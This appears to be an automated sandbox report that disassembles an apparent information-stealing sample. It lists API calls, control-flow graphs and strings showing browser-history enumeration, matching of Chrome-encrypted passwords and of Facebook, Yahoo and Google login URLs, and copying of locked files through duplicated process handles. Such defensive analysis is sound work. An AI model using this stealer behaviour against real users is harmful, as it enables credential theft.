                                                                                                                                                • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                                                                                • String ID: chp$v10
                                                                                                                                                • API String ID: 170802307-2783969131
                                                                                                                                                • Opcode ID: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                • Opcode Fuzzy Hash: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 505 40e2ab-40e2d5 call 40695d call 406b90 510 40e4a0-40e4af call 4069a3 505->510 511 40e2db-40e300 505->511 513 40e304-40e30f call 406e8f 511->513 516 40e314-40e316 513->516 517 40e476-40e483 call 406b53 516->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 516->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->513 525->510 531 40e497-40e49f ??3@YAXPAX@Z 525->531 531->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 550 40e3b0 543->550 551 40e3b3-40e3c1 wcschr 543->551 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 552 40e3fb-40e40c memcpy 549->552 553 40e40f-40e414 549->553 550->551 551->542 556 40e3c3-40e3c6 551->556 552->553 554 40e416-40e427 memcpy 553->554 555 40e42a-40e42f 553->555 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                • memset.MSVCRT ref: 0040E380
                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                • memcpy.MSVCRT ref: 0040E407
                                                                                                                                                • memcpy.MSVCRT ref: 0040E422
                                                                                                                                                • memcpy.MSVCRT ref: 0040E43D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                • API String ID: 3073804840-2252543386
                                                                                                                                                • Opcode ID: 096520a674a6bab575df5dbc744d04c4fa5616f7e231fb41ab5d790b95b66fc2
                                                                                                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                • Opcode Fuzzy Hash: 096520a674a6bab575df5dbc744d04c4fa5616f7e231fb41ab5d790b95b66fc2
                                                                                                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-409248 call 40b273 call 438552 563->569 574 409383-4093ab call 40b273 call 438552 569->574 575 40924e-409258 call 4251c4 569->575 587 4093b1 574->587 588 4094ff-409502 call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 591 4093d3-4093dd call 4251c4 587->591 594 409507-40950b 588->594 598 4093b3-4093cc call 4253cf * 2 591->598 599 4093df 591->599 594->568 597 40950d-409511 594->597 597->568 601 409513-40951d call 408f2f 597->601 598->591 614 4093ce-4093d1 598->614 602 4094f7-4094fa call 424f26 599->602 601->568 602->588 611->580 613 40929f-4092a3 611->613 613->580 615 4092a9-4092ba 613->615 614->591 616 4093e4-4093fb call 4253af * 2 614->616 617 4092bc 615->617 618 4092be-4092e3 memcpy memcmp 615->618 616->602 628 409401-409403 616->628 617->618 619 409333-409345 memcmp 618->619 620 4092e5-4092ec 618->620 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->602 629 409409-40941b memcmp 628->629 629->602 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->602 634 4094b8-4094ed memcpy * 2 631->634 632->602 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->602
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3715365532-3916222277
                                                                                                                                                • Opcode ID: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
                                                                                                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                • Opcode Fuzzy Hash: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
                                                                                                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                  • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                • String ID: bhv
                                                                                                                                                • API String ID: 327780389-2689659898
                                                                                                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                • API String ID: 2941347001-70141382
                                                                                                                                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 711 4467ac-4467b7 __setusermatherr 703->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->712 705->701 707 44674d-44674f 705->707 706->701 709 446734-44673b 706->709 710 446755-446758 707->710 709->701 713 44673d-446745 709->713 710->703 711->712 716 446810-446819 712->716 717 44681e-446825 712->717 713->710 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 726 446853-446864 GetStartupInfoW 721->726 727 44684d-446851 721->727 722->720 723->719 723->724 724->721 728 446840-446842 724->728 730 446866-44686a 726->730 731 446879-44687b 726->731 727->726 727->728 728->721 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2827331108-0
                                                                                                                                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040C298
                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                • String ID: visited:
                                                                                                                                                • API String ID: 1157525455-1702587658
                                                                                                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 781 40e283-40e286 775->781 776->775 787 40e21b-40e21d 776->787 784 40e291-40e294 call 40aa04 781->784 785 40e288-40e290 ??3@YAXPAX@Z 781->785 784->769 785->784 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                • API String ID: 3883404497-2982631422
                                                                                                                                                • Opcode ID: b6600637a152ed979c2f4ee96e02f38a490db88e96d2a506738c93b3ed228158
                                                                                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                • Opcode Fuzzy Hash: b6600637a152ed979c2f4ee96e02f38a490db88e96d2a506738c93b3ed228158
                                                                                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                • memcpy.MSVCRT ref: 0040BD2B
                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 509814883-3916222277
                                                                                                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 848 41837f-4183bf 849 4183c1-4183cc call 418197 848->849 850 4183dc-4183ec call 418160 848->850 855 4183d2-4183d8 849->855 856 418517-41851d 849->856 857 4183f6-41840b 850->857 858 4183ee-4183f1 850->858 855->850 859 418417-418423 857->859 860 41840d-418415 857->860 858->856 861 418427-418442 call 41739b 859->861 860->861 864 418444-41845d CreateFileW 861->864 865 41845f-418475 CreateFileA 861->865 866 418477-41847c 864->866 865->866 867 4184c2-4184c7 866->867 868 41847e-418495 GetLastError ??3@YAXPAX@Z 866->868 871 4184d5-418501 memset call 418758 867->871 872 4184c9-4184d3 867->872 869 4184b5-4184c0 call 444706 868->869 870 418497-4184b3 call 41837f 868->870 869->856 870->856 878 418506-418515 ??3@YAXPAX@Z 871->878 872->871 878->856
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile$??3@ErrorLast
                                                                                                                                                • String ID: |A
                                                                                                                                                • API String ID: 1407640353-1717621600
                                                                                                                                                • Opcode ID: 71e54c5a76e1aa47306962d20987635381793afdf9523ab11eb51246902c22e1
                                                                                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                • Opcode Fuzzy Hash: 71e54c5a76e1aa47306962d20987635381793afdf9523ab11eb51246902c22e1
                                                                                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                • String ID: r!A
                                                                                                                                                • API String ID: 2791114272-628097481
                                                                                                                                                • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                • API String ID: 62308376-4196376884
                                                                                                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
